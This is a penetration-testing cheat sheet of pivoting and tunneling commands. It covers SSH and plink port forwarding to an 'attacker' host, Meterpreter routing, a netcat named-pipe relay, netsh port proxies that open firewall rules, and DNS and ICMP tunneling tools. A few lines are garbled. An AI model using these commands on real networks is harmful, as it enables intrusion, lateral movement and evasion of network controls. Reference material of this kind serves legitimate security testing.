Pivoting_Tunneling
Pivoting/Tunneling
Note: Target must have SSH running for there service
- Create SSH Tunnel:
ssh -D localhost:<local port> -f -N user@localhost -p <Target Port> - Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
- Add the following line into the config:
Socks5 127.0.0.1 <Local Port> - Run commands through the tunnel:
proxychains <command>
In Kali
Source: https://github.com/sshuttle/sshuttle
- sshuttle -r root@172.21.0.0 10.2.2.0/24
Use only if you have a meterpreter shell and you need to pivot to another network.
- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80
In Metasploit
- use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
SESSION yes The session to run this module on.
SUBNET no Subnet (IPv4, for example, 10.10.10.0)
msf5 post(multi/manage/autoroute) >
- set session
- run
1 auxiliary/server/socks4a normal No Socks4a Proxy Server 2 auxiliary/server/socks5 normal No Socks5 Proxy Server 3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection
- ncat -vv --listen 3128 --proxy-type http
- mknod pivot p
- nc -l -p < port to listen on> 0<pivot | nc 1>pivot
# plink in an interactive shell
plink.exe -ssh -L 0.0.0.0:4444:10.1.1.1:445 admin@10.10.1.1
plink.exe -ssh -R 10.10.1.1:4444:127.0.0.1:445 attacker@10.10.1.1
plink.exe -ssh -D 127.0.0.1:8080 admin@10.10.1.1
# plink in non interactive shell
cmd.exe /c echo y | plink.exe -ssh -l admin -pw password -R 10.10.1.1:4444:127.0.0.1:445 attacker@10.10.1.1
netsh local port forwarding:
netsh interface portproxy add v4tov4 listenaddress=10.1.1.1 listenport:4444 connectaddress:10.1.1.1 connectport:3306
netsh advfirewall firewall add rule name="4444_to_3306" protocol=TCP dir=in localip=127.0.0.1 localport=3306 action=allow
From https://werebug.com/pentest-cheatsheet/#port-forwarding
apt install cntlm
cntlm -u username@breakme.local -I proxy
export http://127.0.0.1:3128, export https://127.0.0.1:3128
- Accessing with browser:
chromium --proxy-server="http://127.0.0.1:3128"
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
Windows 10 has SSH (Thanks WSL!) plink.exe (In Kali)
ssh -N -D 127.0.0.1:1337 user@remotehost -p 22222
- The
-Dmeans dynamic. The1337is the port you proxy traffic through. With this you can setup a Socks proxy on your local machine to send traffic to port1337, thus said traffic will be sent through that port, and then through the remote host.-Nis optional, it means do not execute a remote command. Specifying127.0.0.1is also optional. It'll default to127.0.0.1.
Via Putty:
Local port forwarding
ssh -N -L 0.0.0.0:4455:10.1.1.1:445 user@remotehost
or
ssh -L 8080:localhost:8080 user@remotehost
The -L stands for local. First 8080 is port of your machine, 2nd 8080 is port of remote machine (doesn't have to be the same port). After successful ssh connection, if you request localhost:8080 (like from your browser, if you're trying to access a localling listening web server on the remote machine) that request will be send through that ssh tunnel to that remote host and you will be able to connect to that remote service. In other words, what this tunnel does is whatever request you sent to your localhost it will be forwarded to remote localhost.
Remote port forwarding
ssh -N -R 10.10.1.1:4455:127.0.0.1:445 attacker@10.10.1.1
Socks5 with SSH
ssh -N -D 127.0.0.1:8888 admin@10.1.1.1
- ssf: https://github.com/securesocketfunneling/ssf
- rpivot: https://github.com/klsecservices/rpivot
- hans (ICMP Tunneling): http://code.gerade.org/hans/
- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
- Dnscat2: https://github.com/iagox86/dnscat2
- Chisel: https://github.com/jpillora/chisel
- httptunnel: In Kali apt install httptunnel